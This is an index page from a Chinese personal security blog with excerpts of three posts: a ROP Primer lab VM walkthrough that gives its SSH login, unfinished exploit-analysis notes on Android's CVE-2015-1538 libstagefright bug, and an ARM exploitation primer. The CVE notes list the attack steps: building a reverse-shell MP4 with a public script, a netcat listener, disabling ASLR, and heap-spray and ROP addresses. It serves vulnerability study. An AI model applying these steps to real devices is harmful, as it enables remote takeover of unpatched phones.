• 首页
  • Android
  • Java
  • Python
  • 信息安全
  • 闲扯淡

Guge's blog

以大多数人的努力程度之低,根本轮不到去拼天赋

ROP

ROP Primer靶机实战练习

2019年1月31日 by Guge Leave a Comment

1、Primer靶机下载地址: https://pan.baidu.com/s/1rYDOK-EDZDEfEYk2_IfRMg

2、靶机开放了80、22、8888端口,访问80端口,是该ROP的一些提示:

给出了ssh的账号密码为:level0 : warmup

[详细阅读…]
Posted in: Android Tagged: ROP

libstagefright漏洞分析笔记【未完】

2017年2月8日 by Guge Leave a Comment

漏洞CVE-2015-1538分析笔记:

1.使用网上的python脚本生成mp4文件(exp.py -c x.x.x.x -p 3523)
2.开启监听:nc -l -v -p 3523
3.在含有漏洞的手机上运行mp4文件,发现并未反弹端口,仅仅是崩溃
4.查看DDMS,确认是setSampleToChunkParams(long,long,unsigned int)+137处
5.先关闭ASLR(echo 0 > /proc/sys/kernel/randomize_va_space)
6.运行android_server,adb forward tcp:23946 tcp:23946
7.IDA attach media server,定位崩溃处
8.spray address(sp_addr)的位置,这个地址其实是frameworks/av/media/libstagefright/MPEG4Extractor.cpp中mDataSource所在的位置,因为mDataSource在堆中,所在的内存地址不是固定的,但是它总会落在一定的范围内。
9.newpc_val = 0xb0002850 # point sp at __dl_restore_core_regs 这个地址应为libc.so中的ROP起始地址(即system的起始地址)

【后续有进展再补充】

Posted in: Android Tagged: CVE-2015-1538, libstagefright, ROP

ARM 利用【转】

2017年1月23日 by Guge Leave a Comment

在本章中,我们将了解 ARM 处理器的基础知识,和 ARM 世界中存在的不同类型的漏洞。 我们甚至会继续利用这些漏洞,以便对整个场景有个清晰地了解。 此外,我们将研究不同的 Android root 攻击和它们在漏洞利用中的基本漏洞。 考虑到目前大多数 Android 智能手机都使用基于 ARM 的处理器,对于渗透测试人员来说,了解 ARM 及其附带的安全风险至关重要。

8.1 ARM 架构导论

ARM 是基于精简指令集(RISC)的架构,这意味着其指令比基于复杂指令集(CISC)的机器少得多。 ARM 处理器几乎遍布我们周围的所有设备,如智能手机,电视,电子书阅读器和更多的嵌入式设备。

ARM 总共有 16 个可见的通用寄存器,为 R0-R15。 在这 16 个中,有 5 个用于特殊目的。 以下是这五个寄存器及其名称:

  • R11: 帧指针 (FP)
  • R12: 过程内寄存器 (IP)
  • R13: 栈指针 (SP)
  • R14: 链接寄存器 (LR)
  • R15: 程序计数器 (PC)

下面的图展示了 ARM 架构:

[详细阅读…]

Posted in: Android Tagged: arm, ROP, 寄存器

微信公众平台

站内搜索

标签

360 Activity ADB Android android studio apktool arm BCTF CSRF CTF drozer hacker精神 IDA ISG java线程 Json Launch4j MySQL ndk Phantomjs python ROP xposed xss Zaker 一周安全 信息安全 信息安全,干货 加壳 华尔街之狼 安全 安全干货 安全竞赛 寄存器 干货 数据库 查找 步长 每天一个小程序 爬虫 程序员 系统信息获取 脱壳 逆向 遍历

近期文章

  • 关于绕过域名(ip)的一些小技巧
  • 骨哥电台第4期:马斯克之地启示录1
  • 骨哥电台第3期:了解马斯克
  • 骨哥电台第2期:钢铁侠原型-霍华德·休斯的故事
  • 它终于让我换下了使用多年的谷歌浏览器

友情链接

CRoot' Blog
void* Future

Copyright © 2021 Guge's blog.

Omega WordPress Theme by ThemeHall